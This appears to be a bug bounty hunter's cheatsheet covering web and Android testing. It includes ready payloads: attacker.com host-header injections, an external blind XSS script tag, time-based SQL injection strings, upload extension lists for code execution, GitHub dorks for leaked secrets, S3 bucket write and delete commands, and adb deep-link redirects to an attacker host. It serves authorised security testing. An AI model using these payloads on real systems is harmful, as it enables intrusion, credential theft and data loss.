Cheatsheets

Bug bounty main checklist:

Given the nature of existing bug bounty programs, I created the below checklist to critically review any target for the first time, this is not a pentest checklist, rather it’s a critical assessment to find vulnerabilities in programs that was already tested many times.[constantly adding new things here]

Critical Checklist

  • Analyse the app putting xss payloads
  • ATO via CSRF attack (changing email)
  • ATO oauth third party apps
  • CSRF in sensitive functions
  • Critical IDORs
  • Upload features for malicious files
  • Horizontal Privilege escalation in company settings
  • Vertical Privilege escalation in company settings
  • Account deletion endpoints
  • 2FA bypass (direct, rate limit, response manipulation, etc)
  • No rate limiting in authentication/sensitive endpoints
  • Rate Limiting Bypasses (after getting 429 response)
  • Check origin IP address (DNS history records)
  • Race condition in functions that allow limited use only
  • Account data deletion
  • HTML injection in custom email functions
  • Dangerous HTTP methods enabled
    X-HTTP-Method-Override: PUT
  • Signup feature
  • Burp plugin ‘ParamMiner’ to guess parameters/headers
  • Check JWT tokens authentication/authorization
  • Check Account creation steps
  • Test weak password policy (low issue + bruteforce = takeover)
  • Captchas bypass
  • Subdomains takeover with impact
  • S3 bucket takeovers
  • Blind XSS in: contact us, ticket support, feedback, chat app
  • Ticket Trick vulnerability
  • Fuzzing for misconfiguration and sensitive files
  • CORS in sensitive endpoints
  • Test XXE if the server accepts svg files
  • Use WaybackUrls for URLS

Session & Password Attacks

Host Header Poisoning:

X-Host: attacker.com
X-Server: attacker.com
X-Forwarded-For: attacker.com
X-Forwarded-Host: attacker.com
  • Parameter Polution – “/email=danielv@gmail.com&email=attacker@gmail.com”
  • Test “remember-me” function
  • Session Fixation
  • Cookie bomb (find any GET request that set cookies “endpoint/?dummy_cookie=reflect_this”)
  • Password reset token not expiring
  • Long Password/Email DoS attack

CSRF Bypasses

  • remove CSRF token from request
  • Remove CSRF token parameter value
  • Change POST to GET and also remove token from get “endpoint/?csrftoken=&dummy=danielvcookies”
  • Use CSRF from another account

JSON CSRF bypass

Change content-type: application/json
to
Content-Type: text/plain or Content-Type: application/x-www-form-urlencoded

File Upload Attacks

  • upload unexpected file format to achieve RCE (swf, html, php, php3, aspx)
  • Use Burp suite Plugin “Upload Scanner” to check different kinds of file upload
  • Blind sql in name file: “pocfilename’+(select*from(select(sleep(20)))a)+’.jpeg”
  • Upload “filename.jpg” – and if the name reflects, try XSS
  • Always try XXE in .docx, .pdf and .xml uploaded files

Always check the upload response for these file extensions:

  • .SVG
  • .HTML
  • .SWF
  • .XML

PHP Extensions:

.php
.php3
.php4
.php5
.php7
.pht
.phar
.phpt
.pgif
.phtml
.phtm

Double extensions

.jpeg.php
.jpg.php
.png.php

Other extensions

asp : .asp, .aspx
perl: .pl, .pm, .cgi, .lib
jsp : .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm

Data Validation

Common Injection Points:

  • Sql in user agent HEADER user-agent: ‘XOR(if(now()=sysdate(),sleep(5*5),0))OR’
  • Parameter ID
  • Currency Values
  • Item Number Values
  • Sorting Parameters (asc, desc)
  • Cookies Values
  • Custom Headers (possible integration with WAF’s, CDN’s)

Blind XSS

"><script src=https://blinddanielv.xss.ht></script>

  • User-Agent
  • place an order and payload 2nd line address
  • contact us page
  • feedback page
  • chat app
  • request something (delete acct, unblock beta feature)
  • Signup page (free trial page)

Open Redirections

Common Places:

open redir + xss: redirectUrl=https://www.google.com/”;alert(0);//

Insecure Direct Object Reference (IDOR)

Common Functions:

  • Non-public Images
  • Receipts
  • Private Files (pdfs, ++)
  • Shipping Info & Purchase Orders
  • Sending/Deleting messages

Common Params:

id=
user=
account=
number=
order=
no=
doc=
key=
email=
group=
profile=
edit=

tip: check SQL injection on IDOR’s

Github OSINT

Clone all the COMPANY or USER repositories:

curl -s "https://api.github.com/users/COMPANYorUSER/repos?per_page=100" | jq -r ".[].git_url" | xargs -L1 git clone

then use GitLeaks tool:

gitleaks -p all-company-and-user-gits\ -o gitleak-results -v

MANUAL GIT OSINT:

Some useful Github dorks

"target" password
"target" access_token
"target" client_secret
"target" account_sid
"target" private_token
"target" secret
"target" credentials
"target" token
"target" config
"target" key
"target" pass
"target" login
"target" ftp
"target" pwd
“company.com” “dev”
“company.com” API_key
“company.com” password
"target" db_host
"target" db_name
"target" db_user
"target" db_password

Dork filter by language:
"company" language:python password

S3 Buckets

List open buckets:

aws s3 ls s3://bucket.name

Download entire bucket files:

aws s3 sync s3://bucket-name .

Upload file to bucket:

aws s3 cp malicious.txt s3://bucket-name/malicious.txt

Remove file from bucket:

aws s3 rm s3://bucket-name/malicious.txt

Mobile:

Static Checklist

  • folders /assets and /res /raw
  • GREP for sensitive keys using this pattern grep -r 'AIza[0-9A-Za-z\\-_]{35}' .
  • search sensitive .txt files
  • Inspect Manifest.xml file
  • /res/values/strings.xml API keys
  • @xml/network_security_config.xml analysis
  • Test deep links in Manifest.xml
  • verify firebase access to /.json, /Users.json, /Logs.json
  • Check Activities/Services/Intents with adb tool
  • Grep sensitive Keywords in decompiled jar files and apk’s folder
  • Sensitive information disclosed in application error messege
  • Binary reverse engineering
  • Collect URLs and Endpoints from apk
  • Sensitive information disclosed in storage of the mobile device
  • Sensitive information found in logs
  • Sensitive information found in cache
  • Sensitive information found in installed application folder
  • Sensitive information stored in shared preference files

Dynamic Checklist

  • Client/Server Side attacks
    • Check for SQL injection
    • XML injection
    • XSS injection
  • App level DOS (long inputs, json dos)
  • Broken Authentication & Authorization
    • Session behavior after pass reset
    • Expired Token can be reused
    • Oauth Flow
    • 2FA bypass
    • Cleartext Transmission
    • Auth bypass using response manipulation
  • Broken Access Control
    • SSRFs
    • Privilege escalations
    • IDORs
    • Unauthorized/Sensitive API calls
  • CAPTCHA implementation flaws & bypass
  • Check for all HTTP methods (PUT, DELETE etc. Use burp intruder using HTTP verb tampering)
  • Other user’s sensitive details enumeration
  • Malicious file upload
  • Server side flaws (IIS, APACHE, TOMCAT etc.)

Keywords:

secret
password
user
token
api
key
internal
staging
ftp
ssh
http
.plist
.json
.conf

Android components

ADB command to trigger Schemes:

am start -W -a android.intent.action.VIEW -d "custom://intent"

Open redirection + steal credentials

adb shell am start -a android.intent.action.VIEW custom://deeplink?parameter=https://attacker.com.br --ez authentication_header true

Adb to trigger components:

Activity:

adb shell am start -n "com.peirr.test/com.peirr.test.MyActivity" --es name "John" --ei age 30

Broadcast Receiver:

adb shell am broadcast -n "com.peirr.test/com.peirr.test.MyReceiver" --es name "John" --ei age 30

Services:

adb shell am startservice -n "com.peirr.test/com.peirr.test.MyService" --es name "John" --ei age 30

XSS with available parameters:

adb shell am start -n com.company.apk/com.company.mseg.activity.CommonActivity -e url "javascript:alert(1)"

Schemas allowed in Activity:

To reproduce local file access use:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "file:///storage/emulated/0/Download/document-blank.pdf"

To reproduce javascript injection:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "javascript://example.com%0A alert(1);"

To reproduce open redirect:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "http://attacker.com.br"